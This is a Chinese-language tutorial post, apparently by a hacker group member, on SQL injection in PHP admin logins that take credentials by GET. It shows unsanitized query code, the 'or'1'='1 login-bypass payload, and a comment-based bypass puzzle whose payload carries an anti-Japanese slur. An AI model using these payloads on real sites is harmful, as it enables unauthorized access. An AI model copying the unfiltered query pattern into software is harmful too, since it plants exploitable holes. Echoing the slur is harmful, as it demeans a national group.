作者:Julie_nana
来自:{ Silic Group }
php以其跨平台的优越性著称。很多网站采用php编写。因为没有像asp那么多的入侵工具,很多人对php的后台并不重视。
我发现很多的get方式登录的后台,但他们大多都不安全。
我们看一个php登陆代码(GET):
- $conn=mysql_connect("ip","name","pass");
- //连接数据库信息
- $query="select uid from admin where adminname=\'$_get["adminname"]\'
- "and password =\'$_get["password"]\'";
- //判断get来的是否正确
- $result=mysql_query($query);
- …
既然是GET,当我们的登录名是nm,密码是pa,php源:
- select uid from admin where adminname=\'nm\'
- and password =\'pa\';
地址栏就成了:
adminlogin.php?adminname=nm&password=bar
如果在地址栏后面加\'or\'1\'=\'1
原来的地址就成了:
adminlogin.php?adminname=nm&password=bar\'or\'1\'=\'1
再回来看源:
- select uid from admin where adminname=\'nm\'
- and password =\'pa\'or\'1\'=\'1\';
一次php完美的简单注射就完成了。
其实xss的攻击思想和这个是十分相似的。不知道大家明白了SQL注射没有。所以并不建议大家用get方式接收后台登录验证信息。
我的博客是用get方式请求显示后台登陆,但是验证信息获取并不靠get
这是一次我搞的安全活动的内容:
admin_login.php是后台管理入口,页面有两个表单:管理名和密码。
在原始代码中对应的变量分别是$admin_name和$admin_pass,登录验证代码为:
- select * from administrator
- where adminname = \'$_GET[admin_name]\' and admin_pass = \'$_GET[admin_pass]\'
这时我在两个表单分别填写:
admin\'/*hacking by Juliet!
japanese all are dogs*/\'
结果我就进了管理后台了。请问原因是什么?
提示:答案共分三个要点,数据库,原始页面,和php程序本身。
后来评出来的标准答案:
原始的表单应该有类似下边的代码:
复制代码
- <FORM ACTION=“admin_login.php” METHOD=“get”>
- <INPUT TYPE=“text” NAME=“admin_name” VALUE=“”></INPUT>
- <INPUT TYPE=“password” NAME=“admin_pass” VALUE=“”></INPUT>
- ……
当输入表单提交以后,浏览器的地址栏就会出现“admin_login.php?admin_name=admin&admin_pass=password“(假如输入的是admin和password)。这些都表明表单是通过get方式来提交的。
由于admin_login.php没有对敏感字符进行过滤,直接将变量带入SQL语句中验证,结果造成SQL注入漏洞,当提交“admin\'/*hacking by Juliet!”和“japanese all are dogs*/\'”之后,SQL语句就变成
复制代码
- select * from administrator
- where adminname = \'admin\'/*hacking by Juliet!\' and admin_pass = \'japanese all are dogs*/\'\'
由于"/*"在SQL语法中表示的是注释,结果后边密码比较的部分就被注释掉,实际执行的SQL语句为:
复制代码
- select * from administrator
- where adminname = \'admin\'
结果,只要数据库中的administrator表中存在admin这个用户名就可以直接进入后台了。如果没有这个用户名的话,那么就不能进入后台